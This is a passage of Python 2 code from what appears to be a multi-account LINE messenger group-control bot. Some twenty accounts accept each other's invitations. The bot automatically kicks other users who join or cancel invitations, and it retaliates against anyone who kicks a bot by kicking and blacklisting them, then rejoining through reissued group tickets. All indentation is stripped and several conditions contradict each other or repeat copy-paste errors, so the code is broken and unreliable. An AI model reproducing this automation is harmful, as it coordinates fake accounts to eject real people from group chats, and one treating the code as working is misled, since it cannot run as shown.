k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Kmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Lmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Mmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Nmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Omid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Pmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Qmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Rmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Tmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Umid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Vmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Wmid:
k15.acceptGroupInvitation(op.param1)
if op.param3 in Smid:
if op.param2 in Xmid:
k15.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Tmid:
if op.param2 in mid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Amid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Bmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Cmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Dmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Emid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Fmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Gmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Hmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Imid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Jmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Kmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Lmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Mmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Nmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Omid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Pmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Qmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Rmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Smid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Umid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Vmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Wmid:
k16.acceptGroupInvitation(op.param1)
if op.param3 in Tmid:
if op.param2 in Xmid:
k16.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Umid:
if op.param2 in mid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Amid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Bmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Cmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Dmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Emid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Fmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Gmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Hmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Imid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Jmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Kmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Lmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Mmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Nmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Omid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Pmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Qmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Rmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Smid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Tmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Vmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Wmid:
k17.acceptGroupInvitation(op.param1)
if op.param3 in Umid:
if op.param2 in Xmid:
k17.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Vmid:
if op.param2 in mid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Amid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Bmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Cmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Dmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Emid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Fmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Gmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Hmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Imid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Jmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Kmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Lmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Mmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Nmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Omid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Pmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Qmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Rmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Smid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Tmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Umid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Wmid:
k18.acceptGroupInvitation(op.param1)
if op.param3 in Vmid:
if op.param2 in Xmid:
k18.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Wmid:
if op.param2 in mid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Amid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Bmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Cmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Dmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Emid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Fmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Gmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Hmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Imid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Jmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Kmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Lmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Mmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Nmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Omid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Pmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Qmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Rmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Smid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Tmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Umid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Vmid:
k19.acceptGroupInvitation(op.param1)
if op.param3 in Wmid:
if op.param2 in Xmid:
k19.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.param3 in Xmid:
if op.param2 in mid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Amid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Bmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Cmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Dmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Emid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Fmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Gmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Hmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Imid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Jmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Kmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Lmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Mmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Nmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Omid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Pmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Qmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Rmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Smid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Tmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Umid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Vmid:
k20.acceptGroupInvitation(op.param1)
if op.param3 in Xmid:
if op.param2 in Wmid:
k20.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k1.acceptGroupInvitation(op.param1)
else:
k1.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Fmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k2.acceptGroupInvitation(op.param1)
else:
k2.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Gmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k3.acceptGroupInvitation(op.param1)
else:
k3.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Hmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k4.acceptGroupInvitation(op.param1)
else:
k4.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Imid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k5.acceptGroupInvitation(op.param1)
else:
k5.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Jmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k6.acceptGroupInvitation(op.param1)
else:
k6.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Kmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k7.acceptGroupInvitation(op.param1)
else:
k7.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Lmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k8.acceptGroupInvitation(op.param1)
else:
k8.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Mmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k9.acceptGroupInvitation(op.param1)
else:
k9.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Nmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
k9.acceptGroupInvitation(op.param1)
else:
k9.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#--------------------------------------------------------
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in owner:
pass
else:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1, "Protect Join nya On Boss\nMatiin dulu kalo mau Ada yang Gabung\nJoinn on/off")
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1, "Protect Join nya On Boss\nMatiin dulu kalo mau Ada yang Gabung\nJoinn on/off")
#------Joined User Kick start------#
if op.type == 32: #Yang Cancel Invitan langsung ke kick
if wait["Protectcancel"] == True:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in owner:
pass
else:
random.choice(KAC).sendText(op.param1, "Jangan di cancel woy...!!!\nAdmin Bukan,Owner Juga Bukan\Kick Ah ??")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
k6.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
k6.kickoutFromGroup(op.param1,[op.param2])
k7.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k6.getGroup(op.param1)
G.preventJoinByTicket = False
k6.updateGroup(G)
Ti = k6.reissueGroupTicket(op.param1)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k5.getGroup(op.param1)
X.preventJoinByTicket = True
k5.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
k7.kickoutFromGroup(op.param1,[op.param2])
k8.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k7.getGroup(op.param1)
G.preventJoinByTicket = False
k7.updateGroup(G)
Ti = k7.reissueGroupTicket(op.param1)
k6.acceptGroupInvitationByTicket(op.param1,Ti)
X = k6.getGroup(op.param1)
X.preventJoinByTicket = True
k6.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Kmid in op.param3:
if op.param2 in Bots:
pass
try:
k8.kickoutFromGroup(op.param1,[op.param2])
k9.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k8.getGroup(op.param1)
G.preventJoinByTicket = False
k8.updateGroup(G)
Ti = k8.reissueGroupTicket(op.param1)
k7.acceptGroupInvitationByTicket(op.param1,Ti)
X = k7.getGroup(op.param1)
X.preventJoinByTicket = True
k7.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Lmid in op.param3:
if op.param2 in Bots:
pass
try:
k9.kickoutFromGroup(op.param1,[op.param2])
k10.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k9.getGroup(op.param1)
G.preventJoinByTicket = False
k9.updateGroup(G)
Ti = k9.reissueGroupTicket(op.param1)
k8.acceptGroupInvitationByTicket(op.param1,Ti)
X = k8.getGroup(op.param1)
X.preventJoinByTicket = True
k8.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Mmid in op.param3:
if op.param2 in Bots:
pass
try:
k10.kickoutFromGroup(op.param1,[op.param2])
k11.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k10.getGroup(op.param1)
G.preventJoinByTicket = False
k10.updateGroup(G)
Ti = k10.reissueGroupTicket(op.param1)
k9.acceptGroupInvitationByTicket(op.param1,Ti)
X = k9.getGroup(op.param1)
X.preventJoinByTicket = True
k9.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
k11.kickoutFromGroup(op.param1,[op.param2])
k12.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k11.getGroup(op.param1)
G.preventJoinByTicket = False
k11.updateGroup(G)
Ti = k11.reissueGroupTicket(op.param1)
k10.acceptGroupInvitationByTicket(op.param1,Ti)
X = k10.getGroup(op.param1)
X.preventJoinByTicket = True
k10.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Omid in op.param3:
if op.param2 in Bots:
pass
try:
